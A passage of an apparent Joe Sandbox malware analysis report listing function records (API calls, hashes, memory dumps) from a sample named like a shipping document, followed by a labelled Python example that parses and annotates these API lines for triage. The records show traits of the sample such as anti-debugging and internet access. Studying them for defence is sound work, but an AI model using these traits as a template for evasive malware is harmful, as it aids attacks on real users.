                    • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00E72342
                    • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00E7236B
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: Internet$OpenOption
                    • String ID: <local>
                    • API String ID: 942729171-4266983199
                    • Opcode ID: 0d1e7dddab751e2e889bd812579ffbcb2579d789c4b1adbb6525778ad5dab29d
                    • Instruction ID: 461a6e7ff3341bfd96645ff78a1ca3f9c7f2b4a5a9340818876c18943e7a79aa
                    • Opcode Fuzzy Hash: 0d1e7dddab751e2e889bd812579ffbcb2579d789c4b1adbb6525778ad5dab29d
                    • Instruction Fuzzy Hash: E611E070501626BADB248F128C84EFBFBA8EF05355F10E22EFA4D76100D2786881D6F0
                    APIs
                    • GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00E03C26,00EC52F8,?,?,?), ref: 00E10ACE
                      • Part of subcall function 00E07D2C: _memmove.LIBCMT ref: 00E07D66
                    • _wcscat.LIBCMT ref: 00E45010
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: FullNamePath_memmove_wcscat
                    • String ID: S
                    • API String ID: 257928180-3334745618
                    • Opcode ID: c370f7a57405398488380eaa63b22c60cd1b236ce545a2de87e9ce07ee00a713
                    • Instruction ID: ce43bc4d3c7dee485fd6349020f3dcb8347833ebae4a9659dcd107edbd0fb8b7
                    • Opcode Fuzzy Hash: c370f7a57405398488380eaa63b22c60cd1b236ce545a2de87e9ce07ee00a713
                    • Instruction Fuzzy Hash: 501165359042089BCB00FB64DD42EDD77F8EF18394B0060A5B98DF7295DAB1BBC59B51
                    APIs
                      • Part of subcall function 00E07F41: _memmove.LIBCMT ref: 00E07F82
                      • Part of subcall function 00E5AEA4: GetClassNameW.USER32(?,?,000000FF), ref: 00E5AEC7
                    • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00E59135
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: ClassMessageNameSend_memmove
                    • String ID: ComboBox$ListBox
                    • API String ID: 372448540-1403004172
                    • Opcode ID: 3fa963adf1cdde97111e81b003973df71929b1aa615a60cacb2aacea4ee82f62
                    • Instruction ID: b3f83ea51e7190c6862beb305e27555066e7152fd76230d6f33a794dd59793f2
                    • Opcode Fuzzy Hash: 3fa963adf1cdde97111e81b003973df71929b1aa615a60cacb2aacea4ee82f62
                    • Instruction Fuzzy Hash: E501F931605225ABCF04EB64CC958FE73A9EF063107141B19F875772C2DE35584C8750
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: __fread_nolock_memmove
                    • String ID: EA06
                    • API String ID: 1988441806-3962188686
                    • Opcode ID: e7af5d5bce844c6f8b566b879b53a49eb512fea426b203ca48bdb1780e6d93e1
                    • Instruction ID: 002cec6735bd345eb9f8455a7d7111c4a667b019b9cefa17b01cd4135e5b2f03
                    • Opcode Fuzzy Hash: e7af5d5bce844c6f8b566b879b53a49eb512fea426b203ca48bdb1780e6d93e1
                    • Instruction Fuzzy Hash: 2701F9729442286EDB28C6A8DC16EFE7BF89B15301F00459BF552E2181E9B5E604C760
                    APIs
                      • Part of subcall function 00E07F41: _memmove.LIBCMT ref: 00E07F82
                      • Part of subcall function 00E5AEA4: GetClassNameW.USER32(?,?,000000FF), ref: 00E5AEC7
                    • SendMessageW.USER32(?,00000180,00000000,?), ref: 00E5902D
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: ClassMessageNameSend_memmove
                    • String ID: ComboBox$ListBox
                    • API String ID: 372448540-1403004172
                    • Opcode ID: 5d5225331396839c3735194e6bbeb2448c1c304e3159d682a47db16395735ba7
                    • Instruction ID: 375ecaee63e043c42f7fa41bde17a791b5bd616c96da746ba764f89cc3a8b4f8
                    • Opcode Fuzzy Hash: 5d5225331396839c3735194e6bbeb2448c1c304e3159d682a47db16395735ba7
                    • Instruction Fuzzy Hash: 4F01B171B41209ABCB14EBA0C8969EB73A8DF05340F24252AB846772C2DE255E4C9661
                    APIs
                      • Part of subcall function 00E07F41: _memmove.LIBCMT ref: 00E07F82
                      • Part of subcall function 00E5AEA4: GetClassNameW.USER32(?,?,000000FF), ref: 00E5AEC7
                    • SendMessageW.USER32(?,00000182,?,00000000), ref: 00E590B0
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: ClassMessageNameSend_memmove
                    • String ID: ComboBox$ListBox
                    • API String ID: 372448540-1403004172
                    • Opcode ID: bed32a47e67dd83b0cfa5236bc122ff0b20c407aab4efa437be7669dfec68d6b
                    • Instruction ID: 3f565ec05622c4f5e76acbf98c4fe61ec54fab9b0fda6d9a1b0027f14391d546
                    • Opcode Fuzzy Hash: bed32a47e67dd83b0cfa5236bc122ff0b20c407aab4efa437be7669dfec68d6b
                    • Instruction Fuzzy Hash: 1801F771B41209ABCF14EB64C8469FF73E88F04301F1429257C46732C2DA255E4C9671
                    APIs
                    • VariantInit.OLEAUT32(?), ref: 00E5C7F6
                      • Part of subcall function 00E5CB06: _memmove.LIBCMT ref: 00E5CB50
                      • Part of subcall function 00E5CB06: VariantInit.OLEAUT32(00000000), ref: 00E5CB72
                      • Part of subcall function 00E5CB06: VariantCopy.OLEAUT32(00000000,?), ref: 00E5CB7C
                    • VariantClear.OLEAUT32(?), ref: 00E5C818
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: Variant$Init$ClearCopy_memmove
                    • String ID: d}
                    • API String ID: 2932060187-1207350282
                    • Opcode ID: 905b0f5e73b5e8f3a0797a40a90e18d4c071d07cab48b399b3bd97cdd561d339
                    • Instruction ID: 2d76db331c7552767f7ecdaa15098e05cb488982230bb2599f7144a9c1b64dbe
                    • Opcode Fuzzy Hash: 905b0f5e73b5e8f3a0797a40a90e18d4c071d07cab48b399b3bd97cdd561d339
                    • Instruction Fuzzy Hash: 521100719007089FC720DF9AD88589BF7F8FF18314B50892FE58AE7652E771A948CB90
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: ClassName_wcscmp
                    • String ID: #32770
                    • API String ID: 2292705959-463685578
                    • Opcode ID: 584521809461d2d7571594527f904e390c389c488d6bfb91101de178dceacd16
                    • Instruction ID: cac3e31bec1209cb4f026807a7a561117d67f5bfd0d5993ec4751b868abd98da
                    • Opcode Fuzzy Hash: 584521809461d2d7571594527f904e390c389c488d6bfb91101de178dceacd16
                    • Instruction Fuzzy Hash: 29E092326002292AE7209AAAAC09EA7F7ACEB55760F101067FD04F3151D961AA4587E1
                    APIs
                      • Part of subcall function 00E3B494: _memset.LIBCMT ref: 00E3B4A1
                      • Part of subcall function 00E20AC0: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00E3B470,?,?,?,00E0100A), ref: 00E20AC5
                    • IsDebuggerPresent.KERNEL32(?,?,?,00E0100A), ref: 00E3B474
                    • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00E0100A), ref: 00E3B483
                    Strings
                    • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00E3B47E
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                    • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                    • API String ID: 3158253471-631824599
                    • Opcode ID: 964dc09943d34ccb87b9497b7c350490ebffbad99b6ceb63f480b6960c0c334c
                    • Instruction ID: 6edf05854477c7d46945c894b677e3ae191cf32687d0b3b58d31256b1db71d01
                    • Opcode Fuzzy Hash: 964dc09943d34ccb87b9497b7c350490ebffbad99b6ceb63f480b6960c0c334c
                    • Instruction Fuzzy Hash: 17E06DB02007108FD7319F69E4097467BE0AB04704F01992DE596F6252EBB5E488CBA1
                    APIs
                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00E859D7
                    • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00E859EA
                      • Part of subcall function 00E652EB: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00E65363
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: FindMessagePostSleepWindow
                    • String ID: Shell_TrayWnd
                    • API String ID: 529655941-2988720461
                    • Opcode ID: da94a169f050a8604657b9312826ecdddeea50dd2332bfec56ef5471cbee0cbe
                    • Instruction ID: eec5b9c20d8d968b203d06b76de6904841e2f72904161bd24ff320f4af1a890e
                    • Opcode Fuzzy Hash: da94a169f050a8604657b9312826ecdddeea50dd2332bfec56ef5471cbee0cbe
                    • Instruction Fuzzy Hash: 72D0C932384711BAE664BB71AC1BFD76A65AB00B50F101935B259BA1E0D9E0A804C754
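Added example (not part of the Joe Sandbox report and not Joe Sandbox code): a small Python parser for the `APIs` call lines in the function records above. It assumes the line shape `• [Part of subcall function XXXXXXXX: ]Name.MODULE(arg,arg,...), ref: XXXXXXXX`, takes as input a handful of call lines copied from this section, and names the immediates a triager would otherwise look up by hand: the window messages passed to SendMessageW/PostMessageW (0x30 WM_SETFONT, 0xB1 EM_SETSEL, 0x111 WM_COMMAND, 0x180/0x182/0x1A2 LB_ADDSTRING/LB_DELETESTRING/LB_FINDSTRINGEXACT), GetStockObject(17) = DEFAULT_GUI_FONT, GetSysColor(18) = COLOR_BTNTEXT, GetFullPathNameW's 0x7FFF buffer length, and InternetSetOptionW option 0x32 = INTERNET_OPTION_CONNECTED_STATE with its 8-byte INTERNET_CONNECTED_INFO buffer. The capability tags returned by `capabilities()` are this example's own labels, not report signatures.

```python
"""Parse the per-function "APIs" call lines of a Joe Sandbox report and
annotate the numeric arguments that matter when triaging the sample.
Added example for this page; it is not Joe Sandbox code."""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Union

Arg = Union[int, str, None]  # hex immediate, literal string, or '?' (unknown)

# Constructed input: call lines copied verbatim from the records in this section.
SAMPLE_LINES = """\
• Part of subcall function 00E01D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00E01D91
• Part of subcall function 00E01D35: GetStockObject.GDI32(00000011), ref: 00E01D87
• GetSysColor.USER32(00000012), ref: 00E86CBD
• SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00E869E3
• InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00E72342
• InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00E7236B
• GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00E03C26,00EC52F8,?,?,?), ref: 00E10ACE
• FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00E859D7
• PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00E859EA
• IsDebuggerPresent.KERNEL32(?,?,?,00E0100A), ref: 00E3B474
• _memset.LIBCMT ref: 00E62D1A
"""

# Line shape assumed by this example (see the records above).
_CALL_RE = re.compile(
    r"^\s*•\s*"
    r"(?:Part of subcall function (?P<sub>[0-9A-F]{8}):\s*)?"
    r"(?P<name>[A-Za-z_]\w*)"
    r"(?:\.(?P<module>[A-Za-z0-9_]+))?"
    r"(?:\((?P<args>.*)\))?"
    r"\s*,?\s*ref:\s*(?P<ref>[0-9A-F]{8})\s*$"
)

# Windows SDK values for the immediates that appear in this sample's records.
WINDOW_MESSAGES: Dict[int, str] = {
    0x0030: "WM_SETFONT", 0x00B1: "EM_SETSEL", 0x0111: "WM_COMMAND",
    0x0180: "LB_ADDSTRING", 0x0182: "LB_DELETESTRING", 0x01A2: "LB_FINDSTRINGEXACT",
}
ARG_CONSTANTS: Dict[tuple, Dict[int, str]] = {
    ("SendMessageW", 1): WINDOW_MESSAGES,
    ("PostMessageW", 1): WINDOW_MESSAGES,
    ("GetStockObject", 0): {17: "DEFAULT_GUI_FONT"},
    ("GetSysColor", 0): {18: "COLOR_BTNTEXT"},
    ("InternetSetOptionW", 1): {50: "INTERNET_OPTION_CONNECTED_STATE"},
}


@dataclass
class ApiCall:
    name: str
    module: Optional[str]
    args: List[Arg]
    ref: str                   # address of the call site
    subcall_of: Optional[str]  # set when the line is "Part of subcall function"


def _parse_arg(tok: str) -> Arg:
    tok = tok.strip()
    if tok == "?":
        return None
    if re.fullmatch(r"[0-9A-F]{8}", tok):
        return int(tok, 16)
    return tok  # literal string argument such as a window class name


def parse_api_lines(text: str) -> List[ApiCall]:
    """Return one ApiCall per line that matches the report's call syntax."""
    calls = []
    for line in text.splitlines():
        m = _CALL_RE.match(line)
        if not m:
            continue
        raw = m.group("args") or ""
        args = [_parse_arg(t) for t in raw.split(",") if t.strip()]
        calls.append(ApiCall(m.group("name"), m.group("module"), args,
                             m.group("ref"), m.group("sub")))
    return calls


def annotate(call: ApiCall) -> List[str]:
    """Name the numeric immediates whose SDK meaning is known."""
    notes = []
    for idx, value in enumerate(call.args):
        table = ARG_CONSTANTS.get((call.name, idx))
        if table and isinstance(value, int) and value in table:
            notes.append(f"arg{idx}=0x{value:X} ({table[value]})")
    if call.name == "GetFullPathNameW" and len(call.args) > 1 and call.args[1] == 0x7FFF:
        notes.append("nBufferLength=0x7FFF (32767 WCHARs, extended-length path buffer)")
    return notes


def capabilities(calls: List[ApiCall]) -> List[str]:
    """Coarse triage tags; the labels are this example's own, not report signatures."""
    tags = set()
    for c in calls:
        if c.module == "WININET":
            tags.add("network:wininet")
        if c.name == "IsDebuggerPresent":
            tags.add("anti-debug:IsDebuggerPresent")
        if c.name == "FindWindowW" and c.args and c.args[0] == "Shell_TrayWnd":
            tags.add("ui:taskbar-window-lookup")
    return sorted(tags)


if __name__ == "__main__":
    parsed = parse_api_lines(SAMPLE_LINES)
    for call in parsed:
        via = f" (via {call.subcall_of})" if call.subcall_of else ""
        print(f"{call.ref}{via}: {call.name}.{call.module}  {' '.join(annotate(call))}")
    print("capabilities:", capabilities(parsed))
```

Run the file directly to print the annotated listing for the constructed sample; to triage other function records, paste their `APIs` lines into `SAMPLE_LINES` and extend `ARG_CONSTANTS` with the immediates you need to name.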